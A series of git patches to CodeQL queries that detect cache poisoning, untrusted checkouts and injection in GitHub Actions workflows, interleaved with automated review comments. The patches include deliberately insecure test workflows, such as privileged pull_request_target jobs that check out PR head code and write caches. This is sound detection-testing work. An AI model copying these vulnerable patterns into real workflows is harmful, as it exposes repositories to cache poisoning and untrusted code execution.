@@ -18,29 +18,6 @@ import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -/** - * Holds if the path cache_path is a subpath of the path untrusted_path. - */ -bindingset[cache_path, untrusted_path] -predicate controlledCachePath(string cache_path, string untrusted_path) { - exists(string normalized_cache_path, string normalized_untrusted_path | - ( - cache_path.regexpMatch("^[a-zA-Z0-9_-].*") and - normalized_cache_path = "./" + cache_path.regexpReplaceAll("/$", "") - or - normalized_cache_path = cache_path.regexpReplaceAll("/$", "") - ) and - ( - untrusted_path.regexpMatch("^[a-zA-Z0-9_-].*") and - normalized_untrusted_path = "./" + untrusted_path.regexpReplaceAll("/$", "") - or - normalized_untrusted_path = untrusted_path.regexpReplaceAll("/$", "") - ) and - normalized_cache_path.substring(0, normalized_untrusted_path.length()) = - normalized_untrusted_path - ) -} - query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob job, Event event, Step source, Step step, string message, string path @@ -86,7 +63,7 @@ where step.(CacheWritingStep).getPath() = "?" or // the cache writing step reads from a path the attacker can control - not path = "?" and controlledCachePath(step.(CacheWritingStep).getPath(), path) + not path = "?" and isSubpath(step.(CacheWritingStep).getPath(), path) ) and not step instanceof PoisonableStep select step, source, step, diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index 5948474d21ad..b9652d46b59f 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -1,7 +1,7 @@ name: Test on: - issue_comment: + pull_request_target: permissions: actions: write 
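Review bot: The `step.(CacheWritingStep).getPath() = "?"` and `not path = "?"` comparisons on the context lines around the new `isSubpath` call look dead now: every `getPath()` override changed in this patch returns a normalized path or `GITHUB_WORKSPACE/`, and the `"?"`-returning `getStepCWD` is removed in the same patch. If no remaining override (outside this view) still yields `"?"`, drop the sentinel checks; otherwise add a comment on the `where` clause naming which step class produces it, since the binding of `path` is outside the hunk and a reader cannot tell.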
@@ -11,6 +11,8 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} - name: Set up Python 3.10 uses: actions/setup-python@v5 with: @@ -22,14 +24,3 @@ jobs: path: ./results/pip key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} restore-keys: ${{ runner.os }}-pip- - - name: Download artifact - uses: dawidd6/action-download-artifact@v2 - with: - name: results - path: results/ - - name: Upload results - uses: actions/upload-artifact@v4 - with: - name: results - path: results/ - if-no-files-found: ignore diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml new file mode 100644 index 000000000000..9afe62d69da0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml @@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ~/.grade/caches/ + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml new file mode 100644 index 000000000000..b39bc7a880f9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml 
@@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: /tmp/caches/ + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index 8bd69d8f245a..f45755adf1d7 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected 
@@ -12,10 +12,8 @@ edges | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | -| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | -| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | -| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | +| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | | .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | 
@@ -24,6 +22,12 @@ edges | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step | | .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | | .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | 
@@ -45,4 +49,4 @@ edges | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index a515bd87334f..cc5ce9bdf874 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected 
@@ -12,10 +12,8 @@ edges | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | -| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | -| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | -| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | +| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | | .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | 
@@ -24,6 +22,12 @@ edges | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step | | .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | | .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | From 1a5a3044c2447e3a58454eba41a134e786d51321 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 18:25:31 +0200 Subject: [PATCH 546/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 8447d10d94bf..a453e0c96129 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.56
+version: 0.1.57
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index b167a960886d..b90f38e4b1a4 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.56
+version: 0.1.57
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 4fffde2fc58962940f4389aab1635b7ce1d6e352 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 27 Sep 2024 21:38:38 +0200
Subject: [PATCH 547/707] Add remote flow sources as a mutable ref source for untrusted checkouts

---
 .../actions/security/UntrustedCheckoutQuery.qll | 12 ++++++++++++
 .../CWE-829/UntrustedCheckoutCritical.expected | 4 ++++
 2 files changed, 16 insertions(+)

diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
index 100a9c5dd5d4..a3ea6be06fc8 100644
--- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
+++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll
@@ -1,5 +1,6 @@
 import actions
 private import codeql.actions.DataFlow
+private import codeql.actions.dataflow.FlowSources
 private import codeql.actions.TaintTracking
 
 /**
@@ -8,6 +9,17 @@ private import codeql.actions.TaintTracking
 */
 private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig {
 predicate isSource(DataFlow::Node source) {
+ // remote flow sources
+ source instanceof ArtifactSource
+ or
+ source instanceof GitHubCtxSource
+ or
+ source instanceof GitHubEventCtxSource
+ or
+ source instanceof GitHubEventJsonSource
+ or
+ source instanceof MaDSource
+ or
 // `ref` argument contains the PR id/number or head ref
 exists(Expression e |
 source.asExpr() = e and
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index 9358d65e8f4b..4dc2b53e5910 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
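Review bot: The five new `instanceof` disjuncts make every `ArtifactSource`, `GitHubCtxSource`, `GitHubEventCtxSource`, `GitHubEventJsonSource` and `MaDSource` a mutable-ref source, but the existing comment `// \`ref\` argument contains the PR id/number or head ref` now describes only the last disjunct and nothing states why the generic sources qualify. The new branch is deliberately broader than the old one — any remote-controlled value reaching a checkout ref is treated as mutable, while the second branch only recognises PR-ref patterns — so a QLDoc on `isSource` saying so, e.g. `/** A checkout ref is mutable when it is derived from any remote flow source, or when its literal value contains a PR id/number or head ref. */`, would save the next reader from reverse-engineering the intent. Whether `GitHubCtxSource` includes values such as a commit SHA that are not attacker-mutable is not visible here; if it does, this config will need a barrier to avoid false positives. The module continues outside the hunk.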
@@ -266,6 +266,10 @@ edges #select | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | From 1b3b47bb1edfa5704b0e5538db4395112a43786e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 21:39:51 +0200 Subject: [PATCH 548/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a453e0c96129..6f57c4554d07 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.57 +version: 0.1.58 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b90f38e4b1a4..d3b65425c413 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.57 +version: 0.1.58 groups: [actions, queries] suites: codeql-suites extractor: javascript From f2c5a14883fb0ebc859f4dabd73051c8245eba37 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 28 Sep 2024 23:57:32 +0200 Subject: [PATCH 549/707] Fix: ControlChecks protects/dominates only work with Steps. A sink can be in a sub-step node (eg: ScalarValue) --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 12 ++ .../codeql/actions/security/ControlChecks.qll | 22 +- .../CWE-077/EnvVarInjectionCritical.ql | 11 +- .../CWE-078/CommandInjectionCritical.ql | 6 +- .../CWE-077/.github/workflows/test11.yml | 81 ++++++++ .../CWE-077/.github/workflows/test12.yml | 80 +++++++ .../CWE-077/EnvVarInjectionCritical.expected | 19 ++ .../CWE-077/EnvVarInjectionMedium.expected | 16 ++ .../actions/run-airbyte-ci/action.yaml | 196 ++++++++++++++++++ .../CWE-078/.github/workflows/test1.yml | 63 ++++++ .../CWE-078/CommandInjectionCritical.expected | 7 + .../CWE-078/CommandInjectionMedium.expected | 9 + 13 files changed, 507 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 17b0dab4ee67..63f2552f5829 100644 --- a/ql/lib/codeql/actions/Ast.qll 
+++ b/ql/lib/codeql/actions/Ast.qll
@@ -13,6 +13,8 @@ class AstNode instanceof AstNodeImpl {
 string toString() { result = super.toString() }
+ Step getEnclosingStep() { result = super.getEnclosingStep() }
+
 Job getEnclosingJob() { result = super.getEnclosingJob() }
 Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() }
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index 5361943331b2..d4716f89e191 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -110,6 +110,18 @@ abstract class AstNodeImpl extends TAstNode {
 result = this.getEnclosingCompositeAction().getACallerJob()
 }
+ /**
+ * Gets the enclosing Step.
+ */
+ StepImpl getEnclosingStep() {
+ if this instanceof StepImpl
+ then result = this
+ else
+ if this instanceof ScalarValueImpl
+ then result.getAChildNode*() = this.getParentNode()
+ else none()
+ }
+
 /**
 * Gets the enclosing workflow if any.
 */
diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll
index 052b22cd3387..b9410f0fcb02 100644
--- a/ql/lib/codeql/actions/security/ControlChecks.qll
+++ b/ql/lib/codeql/actions/security/ControlChecks.qll
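Review bot: The public `Step getEnclosingStep()` added to `AstNode` carries no QLDoc, although it is the member query authors will see and the delegate it calls in `ast/internal/Ast.qll` is documented. Add `/** Gets the enclosing step, if any. */` above it, phrased like the internal `getEnclosingWorkflow` doc so the public accessors read consistently. The `AstNode` class continues outside the hunk.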
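Review bot: `getEnclosingStep()` in `AstNodeImpl` yields a result only for `StepImpl` and `ScalarValueImpl`; every other node kind falls into `else none()`, and the doc comment `Gets the enclosing Step.` does not say so. `ControlCheck.dominates` in `ControlChecks.qll` (same commit) is rebuilt on top of this, so a sink of any other kind nested in a step is never dominated by a step-level `if` or a preceding check step and is reported even when one exists — safe in direction, but a silent source of false positives whose reach I cannot confirm from the hunk. Reword the doc to `/** Gets the enclosing step, if any. Only steps and scalar values nested in a step have one; other node kinds yield nothing. */`, and consider letting the second branch walk `getParentNode()` for any nested node rather than only `ScalarValueImpl`. The reflexive closure in `getAChildNode*()` already covers the case where the parent is the step itself, which deserves a one-line comment.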
@@ -37,29 +37,29 @@ abstract class ControlCheck extends AstNode {
 this instanceof Run
 }
- predicate protects(Step step, Event event, string category) {
+ predicate protects(AstNode node, Event event, string category) {
 // The check dominates the step it should protect
- this.dominates(step) and
+ this.dominates(node) and
 // The check is effective against the event and category
 this.protectsCategoryAndEvent(category, event.getName()) and
 // The check can be triggered by the event
 this.getEnclosingJob().getATriggerEvent() = event
 }
- predicate dominates(Step step) {
+ predicate dominates(AstNode node) {
 this instanceof If and
 (
- step.getIf() = this or
- step.getEnclosingJob().getIf() = this or
- step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or
- step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this
+ node.getEnclosingStep().getIf() = this or
+ node.getEnclosingJob().getIf() = this or
+ node.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or
+ node.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this
 )
 or
 this instanceof Environment and
 (
- step.getEnclosingJob().getEnvironment() = this
+ node.getEnclosingJob().getEnvironment() = this
 or
- step.getEnclosingJob().getANeededJob().getEnvironment() = this
+ node.getEnclosingJob().getANeededJob().getEnvironment() = this
 )
 or
 (
@@ -67,9 +67,9 @@ abstract class ControlCheck extends AstNode {
 this instanceof UsesStep
 ) and
 (
- this.(Step).getAFollowingStep() = step
+ this.(Step).getAFollowingStep() = node.getEnclosingStep()
 or
- step.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step)
+ node.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step)
 )
 }
diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
index b301915d79c5..ad97dd3caefd 100644
--- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
+++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql
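Review bot: Widening `protects` and `dominates` from `Step` to `AstNode` changes what the predicates promise, but neither gained a QLDoc; the distinction that the job-level `if`, needed-job and `Environment` cases apply to any node in the job while the step-level `if` (first hunk) and `getAFollowingStep()` (second hunk) cases require the node to have an enclosing step is now load-bearing and should be written down. Suggested: `/** Holds if this check dominates node: job-level checks apply to every node in the job, step-level checks only to nodes that have an enclosing step. */` on `dominates`, and `/** Holds if this check protects node against category when the job is triggered by event. */` on `protects`. Both predicates are complete within the hunks.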
@@ -22,19 +22,20 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, E
 where
 EnvVarInjectionFlow::flowPath(source, sink) and
 inPrivilegedContext(sink.getNode().asExpr(), event) and
- not exists(ControlCheck check |
- check.protects(sink.getNode().asExpr(), event, "envvar-injection")
- ) and
 // exclude paths to file read sinks from non-artifact sources
 (
+ // source is text
 not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
 not exists(ControlCheck check |
- check.protects(sink.getNode().asExpr(), event, "code-injection")
+ check.protects(sink.getNode().asExpr(), event, ["envvar-injection", "code-injection"])
 )
 or
+ // source is an artifact or a file from an untrusted checkout
 source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
 not exists(ControlCheck check |
- check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"])
+ check
+ .protects(sink.getNode().asExpr(), event,
+ ["envvar-injection", "untrusted-checkout", "artifact-poisoning"])
 ) and
 (
 sink.getNode() instanceof EnvVarInjectionFromFileReadSink or
diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql
index 80281e8db30a..c3d6fa74f6c5 100644
--- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql
+++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql
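Review bot: The new comment `// source is text` does not describe the condition beneath it, which is `not ... getSourceType() = "artifact"`; `// non-artifact source: only an envvar-injection or code-injection control can protect the sink` would name both the branch and why its category list differs from the artifact branch below. Folding the former top-level `"envvar-injection"` exclusion into each branch's category list keeps the same suppression for that category, so this reads as a refactor rather than a behaviour change; a sentence saying so in a comment would spare the next reader the comparison. The `where` clause continues past the end of the hunk.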
@@ -16,11 +16,15 @@
 import actions
 import codeql.actions.security.CommandInjectionQuery
 import CommandInjectionFlow::PathGraph
+import codeql.actions.security.ControlChecks
 from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Event event
 where
 CommandInjectionFlow::flowPath(source, sink) and
- inPrivilegedContext(sink.getNode().asExpr(), event)
+ inPrivilegedContext(sink.getNode().asExpr(), event) and
+ not exists(ControlCheck check |
